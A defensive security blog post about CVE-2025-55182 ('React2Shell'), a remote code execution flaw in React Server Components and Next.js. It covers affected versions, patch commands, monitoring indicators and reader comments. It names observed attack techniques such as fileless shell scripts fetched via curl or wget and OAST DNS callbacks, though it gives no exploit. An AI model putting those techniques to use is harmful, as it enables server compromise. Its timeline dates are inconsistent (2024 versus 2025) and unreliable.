Critical Security Vulnerability in Next.js & React: CVE-2025-55182 (React2Shell)

Overview: A Maximum Severity Threat

A critical remote code execution vulnerability has been discovered in React Server Components and Next.js, earning the highest possible severity rating of CVSS 10.0. Known as "React2Shell," this flaw allows attackers to execute arbitrary code on your server without any authentication. With exploitation already observed in the wild and near-100% reliability, immediate action is required.

What Makes This Vulnerability So Dangerous?

CVE-2025-55182: The Core React Vulnerability

The vulnerability affects React Server Components (RSC) in React 19, specifically how the "Flight" protocol handles server-side requests. The issue stems from unsafe deserialization of payloads sent to React Server Function endpoints.

Key Facts:

• CVSS Score: 10.0 (Maximum Severity)
• Authentication Required: None
• Attack Complexity: Low
• Exploit Reliability: Near 100% success rate
• Public Exploits: Available
• Active Exploitation: Confirmed in the wild

CVE-2025-66478: The Next.js Impact

This vulnerability tracks the downstream impact on Next.js applications. Since Next.js uses React Server Components, applications built with the App Router are directly affected.

Who Is Affected?

Vulnerable React Versions:

• React 19.0.0
• React 19.1.0
• React 19.1.1
• React 19.2.0

Affected Packages:

• react-server
• react-server-dom-webpack
• react-server-dom-turbopack
• react-server-dom-parcel

Vulnerable Next.js Versions:

• Next.js 15.x (all versions before patched releases)
• Next.js 16.x (all versions before patched releases)
• Next.js 14.3.0-canary.77 and later canary releases

Not Affected:

• Next.js 13.x
• Next.js 14.x stable releases
• Applications using only Pages Router
• Applications on Edge Runtime
• Apps without React Server Components

Other Affected Frameworks:

• React Router
• Waku
• RedwoodJS (RedwoodSDK)
• Expo
• Vite (with RSC plugin)
• Parcel (with RSC plugin)

The Scale of the Problem

According to security researchers:

• 39% of cloud environments contain vulnerable instances
• 968,000+ React and Next.js instances detected on public internet
• 10 million+ active websites globally use these frameworks
• 44% of all cloud environments have publicly exposed Next.js instances

Major platforms built with React include Instagram, Netflix, Airbnb, and thousands of enterprise applications.

How the Attack Works

The vulnerability allows attackers to:

1. Craft malicious HTTP requests to any Server Function endpoint
2. Exploit unsafe deserialization in the RSC Flight protocol
3. Execute arbitrary JavaScript code on the server with full privileges
4. Achieve remote code execution without authentication

The attack requires only network access and works against default configurations with no special setup needed.

Observed Attacks in the Wild

Security researchers have documented active exploitation including:

• Initial Access Broker (IAB) activity with suspected ties to state-sponsored actors
• Fileless shell script execution via curl or wget
• Installation of SNOWLIGHT and VShell Trojans
• DNS queries to OAST platforms (*.oast.live, *.oastify.com)
• Anomalous processes spawned from Next.js containers

Immediate Action Required: How to Protect Your Site

Step 1: Update to Patched Versions

For React:

Update to the fixed versions:

• React 19.0.1
• React 19.1.2
• React 19.2.1

npm install react@19.2.1 react-dom@19.2.1

For Next.js:

Use the automated fix tool:

npx fix-react2shell-next

Or manually update to patched versions:

# For Next.js 15.0.x
npm install next@15.0.5

# For Next.js 15.1.x
npm install next@15.1.9

# For Next.js 15.2.x
npm install next@15.2.6

# For Next.js 15.3.x
npm install next@15.3.6

# For Next.js 15.4.x
npm install next@15.4.8

# For Next.js 15.5.x
npm install next@15.5.7

# For Next.js 16.0.x
npm install next@16.0.7

For Next.js 14 Canary Users:

Downgrade to stable version:

npm install next@14

Step 2: Verify Your Updates

After updating, verify the installation:

npm list react react-dom next

Ensure all packages show the patched versions.

Step 3: Rebuild and Redeploy

# Clear build cache
rm -rf .next

# Rebuild your application
npm run build

# Redeploy immediately

Additional Security Measures

1. Enable Web Application Firewall (WAF)

If you're hosted on major platforms, WAF rules have been deployed:

• Vercel: Automatic protection for all projects (still update!)
• Cloudflare: New WAF rules deployed
• Google Cloud: WAF rules available
• AWS WAF: Check for available rule updates

Important: WAF protection is temporary. You must still update your dependencies.

2. Monitor for Suspicious Activity

Watch for these indicators of compromise:

• Unusual DNS queries to OAST platforms
• Unexpected processes spawned by Node.js/Next.js
• Anomalous outbound network connections
• Suspicious HTTP requests to Server Function endpoints
• New user accounts or elevated privileges

3. Implement Runtime Monitoring

Set up alerts for:

• Container escapes
• Privilege escalation attempts
• Unexpected file system modifications
• Malicious shell script execution

4. Network Segmentation

If immediate patching isn't possible:

• Restrict network access to affected applications
• Implement strict firewall rules
• Use network segmentation to limit blast radius
• Enable enhanced logging on Server Function endpoints

5. Audit Your Dependencies

Check all dependencies that might bundle vulnerable React versions:

npm audit
npm list react-server

Prevention and Long-Term Security

1. Implement Automated Dependency Scanning

Use tools like:

• Dependabot (GitHub)
• Snyk
• Trivy
• npm audit

Configure automatic pull requests for security updates.

2. Create Security Policies

Implement CI/CD policies to:

• Block deployments with known vulnerabilities
• Require security reviews for dependency updates
• Scan container images before deployment
• Monitor SBOM (Software Bill of Materials)

3. Regular Security Audits

Schedule regular audits of:

• Application dependencies
• Server configurations
• Access controls
• Network policies

4. Stay Informed

Subscribe to security advisories:

• React Security Blog
• Next.js Security Advisories
• NPM Security Advisories

5. Follow Security Best Practices

• Keep all dependencies up to date
• Use package lock files
• Implement least privilege access
• Enable security headers
• Use Content Security Policy (CSP)
• Implement rate limiting
• Enable HTTPS everywhere

Verification Checklist

Use this checklist to ensure your site is protected:

• [ ] Updated React to 19.0.1, 19.1.2, or 19.2.1
• [ ] Updated Next.js to patched version for your release line
• [ ] Verified updates with npm list
• [ ] Cleared build cache and rebuilt application
• [ ] Redeployed to production
• [ ] Verified WAF rules are active (if applicable)
• [ ] Enabled security monitoring
• [ ] Reviewed logs for suspicious activity
• [ ] Updated all other affected frameworks
• [ ] Documented the update in your security log
• [ ] Notified relevant team members
• [ ] Scheduled follow-up security audit

Why This Matters for Your Business

A successful exploitation could result in:

• Data Breaches: Access to sensitive customer data
• Service Disruption: Complete server compromise
• Reputational Damage: Loss of customer trust
• Financial Loss: Regulatory fines, incident response costs
• Legal Liability: Lawsuits and compliance violations
• Intellectual Property Theft: Access to proprietary code and data

Timeline of the Vulnerability

• November 29, 2024: Lachlan Davidson reported the flaw to Meta
• November 30, 2024: Meta confirmed the issue
• December 3, 2025: Public disclosure and patches released
• December 4, 2025: Active exploitation observed in the wild
• December 6, 2025: Automated fix tool released
• December 8, 2025: Widespread exploitation campaigns detected

Frequently Asked Questions

Q: Am I affected if I use Next.js Pages Router?
A: No, only App Router applications are affected.

Q: Do I need to change my code after updating?
A: No, the patches are drop-in replacements requiring no code changes.

Q: Is WAF protection sufficient?
A: No, WAF rules are a temporary measure. You must update your dependencies.

Q: How can I test if my site is vulnerable?
A: Do not test in production. Update immediately instead. Security researchers have tools for controlled testing environments.

Q: What if I can't update immediately?
A: Deploy WAF rules, restrict network access, enhance monitoring, and prioritize the update as your top priority.

Resources and References

• React Security Advisory (CVE-2025-55182)
• Next.js Security Advisory (CVE-2025-66478)
• Automated Fix Tool
• Wiz Security Analysis
• NIST NVD Entry

Conclusion

CVE-2025-55182 (React2Shell) represents one of the most critical vulnerabilities in the React ecosystem. With a maximum severity rating, active exploitation in the wild, and the potential for devastating impact, updating your applications is not optional—it's an emergency.

Take action now:

1. Run npx fix-react2shell-next
2. Verify your updates
3. Redeploy immediately
4. Monitor for suspicious activity

Don't wait. Every minute your application remains unpatched increases the risk of compromise. The security of your users, your data, and your business depends on immediate action.

---

Last Updated: December 9, 2025

Disclaimer: This blog post is for informational purposes only. Always refer to official security advisories and consult with your security team for guidance specific to your environment.

Comments

[Nodirbek Ergashev]

You are life saver

[sizan mahmud0]

Thank you for your comment

[Roger Wilco]

Unsafe deserialization? Did it written by vibecoders?

[sizan mahmud0]

Link-1
Link-2
Link-3

I read so many blogs before writing about this topic. I used Unsafe deserialization keyword. Anyone can understand what I mean. A few bloggers used this keyword. If I make any mistake, please tell me. I really appreciate your comment and am ready to correct myself.

[Roger Wilco]

No, it's okay with you term. I mean folks who did it inside react code